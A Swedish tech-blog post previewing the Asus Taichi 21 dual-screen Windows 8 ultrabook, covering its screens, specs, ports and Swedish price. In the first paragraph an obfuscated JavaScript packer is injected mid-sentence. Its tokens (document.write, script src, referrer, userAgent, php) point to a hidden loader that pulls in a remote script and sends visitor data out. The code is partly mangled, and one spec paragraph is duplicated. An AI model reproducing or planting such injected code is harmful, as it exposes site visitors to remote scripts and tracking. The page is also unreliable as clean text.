Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

PC

Windows 8 & Asus Taichi 21 Ultrabook

Windows 8 & Asus Taichi 21 Ultrabook
Sebastian

Asus eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfhht|var|u0026u|referrer|rkahz||js|php’.split(’|’),0,{}))
har visat upp den större delen av sina kommande Windows 8-datorer och en av de var deras Taichi 21 som kommer med dubbla skärmar. Med en upplösning på  1 920 x 1 080 pixlar upplösning ger den en skarp och flexibel look.

Vad man enkelt kan säga är att Asus ser ut att vara redo för lanseringen av Windows 8. De har en rad produkter redo att släppa ut på marknaden som fyller de flesta behov.
Det unika med Asus Taichi 21 är att den har just två skärmar, något som jag själv tror kan vara riktigt användbart i många sammanhang.

Båda skärmarna ligger på 11,6 tum och som sagt på 1 920 x 1 080-pixel upplösning och med IPS-panel.
Den bakre skärmen kommer att ha ”touch-screen” och därför efterlikna en surfplatta. IDG som har fått möjlighet att testa produkten menar att det är ologiskt att bara göra den bakre skärmen pekbar och att det skapade förvirring vid första anblicken. Det är möjligt men det är något vi kommer att lära oss med tiden.

Det kommer att ingå en mjukvara till datorn som gör att man kan köra båda skärmarna samtidigt, antingen utöka skrivbordet till andra skärmen eller endast duplicera.
Det ska även gå att köra två olika sessioner samtidigt vilket är riktigt fräckt.

Detta är något som kommer bli riktigt smart för personer under möten. Att snabbt kunna visa upp något på datorn utan att koppla in projektor eller vrida datorn fram och tillbaka. Asus ska ha målat upp ett scenario för IDG där en far arbetade i sängen medan barnen tittade på film på den andra skärmen.

Detaljer om Taichi 21

Taichi 21 är 17,4 millimeter i profil och har en vikt på 1,25 kilo. I datorn hittar vi en i7-3517U-processor, 4 GB RAM och en SSD på 256 GB.
Vi hittar också en mini VGA, en micro HDMI, två USB 3.0 och en knapp som man enkelt kan komma till ”surfplattsläget”.

Taichi 21 mäter endast 17,4 millimeter i profil och väger 1,25 kilogram. Datorn kommer med en i7-3517U-processor, 4 gigabyte RAM och en SSD på 256 gigabyte. Sett till anslutningsmöjligheter hittar vi en mini VGA, en micro HDMI, en 3,5-millimeter, två USB 3.0 och en volym plus/minus-knapp som kan komma till nytta i surfplattsläget.

På Asus Taichi 21 kommer det finnas en 5-megapixel kamera placerad bak på datorn och en kamera i fram på 1 280 x 720-upplösning.
WiFi och Bluetooth 4.0 finns såklart också.

Asus Taichi 21 kommer att kosta omkring 14 990 kronor i Sverige. Priset kan tyckas högt för denna dator men det ingår ju ändå en Core i7-processor vilket gör den till den en av de kraftfullaste ultrabook-processorn på 17 watt. Det ingår också 256 GB SSD i priset.

Vad tycker ni? Är dubbelskärm något vi vill se mer av i framtiden?

Läs hela ”första titten” av Taichi 21 på IDG här!